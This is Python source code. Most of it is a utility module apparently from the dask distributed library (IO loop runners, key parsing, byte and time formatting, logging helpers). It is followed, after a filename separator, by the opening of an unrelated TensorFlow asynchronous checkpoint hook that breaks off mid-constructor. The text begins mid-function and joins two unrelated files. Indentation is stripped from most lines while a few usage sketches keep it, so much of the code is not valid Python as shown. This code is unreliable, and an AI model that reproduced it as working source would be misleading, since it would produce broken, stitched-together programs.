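    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.connect(("8.8.8.8", 80))  # routing decision only, no I/O
        return sock.getsockname()[0]
    finally:
        sock.close()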
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does not have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions:
pass
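# Usage sketch: `ignoring` plays the role of contextlib.suppress (which is
# unavailable under Python 2), e.g.
#
#   with ignoring(OSError):
#       os.remove(path)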
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise, if they err, they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned.
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
raise gen.Return(results)
@gen.coroutine
def Any(args, quiet_exceptions=()):
""" Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise, if they err, they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned.
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when used after being closed, so do the check ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
timeout = kwargs.pop("callback_timeout", None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with ignoring(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
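# Minimal usage sketch (not part of the original module): LoopRunner.run_sync
# starts a private IO loop thread if needed, runs the coroutine to completion
# via sync(), then stops the loop again.
def _demo_loop_runner():
    @gen.coroutine
    def add(x, y):
        yield gen.moment
        raise gen.Return(x + y)

    runner = LoopRunner()
    return runner.run_sync(add, 1, 2)  # returns 3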
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
try:
from functools import lru_cache
except ImportError:
    lru_cache = False
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return "Other"
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return x
else:
return "Other"
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec(
"""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
"""
)
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
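    Examples
    --------
    >>> from io import BytesIO  # doctest: +SKIP
    >>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300')  # doctest: +SKIP
    >>> _ = f.seek(5)  # doctest: +SKIP
    >>> seek_delimiter(f, b'\\n', 2 ** 16)  # doctest: +SKIP
    >>> f.tell()  # first byte after the delimiter  # doctest: +SKIP
    11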
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2 ** 16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2 ** 16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=""):
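    """Yield a temporary file path that does not exist yet; anything created
    at that path (file or directory) is cleaned up on exit.

    >>> with tmpfile('.txt') as fn:  # doctest: +SKIP
    ...     _ = open(fn, 'w').write('data')
    """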
extension = "." + extension.lstrip(".")
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
try:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, "encode"):
return s.encode()
raise TypeError("Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=""):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
if ext == ".egg":
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext in (".zip", ".pyz"):
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ("index",)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
>>> format_bytes(1234567890000)
'1.23 TB'
>>> format_bytes(1234567890000000)
'1.23 PB'
"""
if n > 1e15:
return "%0.2f PB" % (n / 1e15)
if n > 1e12:
return "%0.2f TB" % (n / 1e12)
if n > 1e9:
return "%0.2f GB" % (n / 1e9)
if n > 1e6:
return "%0.2f MB" % (n / 1e6)
if n > 1e3:
return "%0.2f kB" % (n / 1000)
return "%d B" % n
byte_sizes = {
"kB": 10 ** 3,
"MB": 10 ** 6,
"GB": 10 ** 9,
"TB": 10 ** 12,
"PB": 10 ** 15,
"KiB": 2 ** 10,
"MiB": 2 ** 20,
"GiB": 2 ** 30,
"TiB": 2 ** 40,
"PiB": 2 ** 50,
"B": 1,
"": 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and "i" not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and "i" in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(" ", "")
if not s[0].isdigit():
s = "1" + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
"s": 1,
"ms": 1e-3,
"us": 1e-6,
"ns": 1e-9,
"m": 60,
"h": 3600,
"d": 3600 * 24,
}
tds2 = {
"second": 1,
"minute": 60,
"hour": 60 * 60,
"day": 60 * 60 * 24,
"millisecond": 1e-3,
"microsecond": 1e-6,
"nanosecond": 1e-9,
}
tds2.update({k + "s": v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default="seconds"):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
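    >>> parse_timedelta(3, default='ms')  # bare numbers use the default unit
    0.003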
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(" ", "")
if not s[0].isdigit():
s = "1" + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
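    Examples
    --------
    >>> print(asciitable(['x', 'y'], [(1, 2), (10, 20)]))
    +----+----+
    | x  | y  |
    +----+----+
    | 1  | 2  |
    | 10 | 20 |
    +----+----+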
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape, frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print("TIME WARNING", text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return "%.2f s" % n
if n >= 1e-3:
return "%.2f ms" % (n * 1e3)
return "%.2f us" % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop("n", 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
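# Minimal usage sketch (not part of the original module): keep the most recent
# log records in memory for later inspection.
def _demo_deque_handler():
    handler = DequeHandler(n=100)
    demo_logger = logging.getLogger("deque-demo")
    demo_logger.addHandler(handler)
    demo_logger.warning("something happened")
    return list(handler.deque)  # LogRecord objects, oldest first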
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if "asyncio" in sys.modules and tornado.version_info[0] >= 5:
jupyter_event_loop_initialized = False
if "notebook" in sys.modules:
import traitlets
from notebook.notebookapp import NotebookApp
jupyter_event_loop_initialized = traitlets.config.Application.initialized() and isinstance(
traitlets.config.Application.instance(), NotebookApp
)
if not jupyter_event_loop_initialized:
import asyncio
import tornado.platform.asyncio
asyncio.set_event_loop_policy(
tornado.platform.asyncio.AnyThreadEventLoopPolicy()
)
def has_keyword(func, keyword):
if PY3:
return keyword in inspect.signature(func).parameters
else:
# https://stackoverflow.com/questions/50100498/determine-keywords-of-a-tornado-coroutine
if gen.is_coroutine_function(func):
func = func.__wrapped__
return keyword in inspect.getargspec(func).args
if lru_cache:
has_keyword = lru_cache(1000)(has_keyword)
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================
"""Hook for asynchronous checkpointing.
This hook dispatches checkpoint writing operations in a separate thread to
allow execution to continue on the main thread.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import training_util
from tensorflow.python.training.session_run_hook import SessionRunArgs
from tensorflow.python.training.summary_io import SummaryWriterCache
class AsyncCheckpointSaverHook(basic_session_run_hooks.CheckpointSaverHook):
"""Saves checkpoints every N steps or seconds."""
def __init__(self,
checkpoint_dir,
save_secs=None,
save_steps=None,
saver=None,
checkpoint_basename="model.ckpt",
scaffold=None,
listeners=None):
"""Initializes a `CheckpointSaverHook`.
Args:
checkpoint_dir: `str`, base directory for the checkpoint files.
save_secs: `int`, save every N secs.
save_steps: `int`, save every N steps.
saver: `Saver` object, used for saving.
checkpoint_basename: `str`, base name for the checkpoint files.
scaffold: `Scaffold`, use to get saver object.
listeners: List of `CheckpointSaverListener` subclass instances. Used for
callbacks that run immediately before or after this hook saves the
checkpoint.
Raises:
ValueError: One of `save_steps` or `save_secs` should be set.
ValueError: At most one of `saver` or `scaffold` should be set.
"""
logging.info("Create AsyncCheckpointSaverHook.")
if saver is not None and scaffold is not None:
raise ValueError("You cannot provide both saver and scaffold.")
self._saver = saver
self._save_thread = None
self._checkpoint_dir = checkpoint_dir
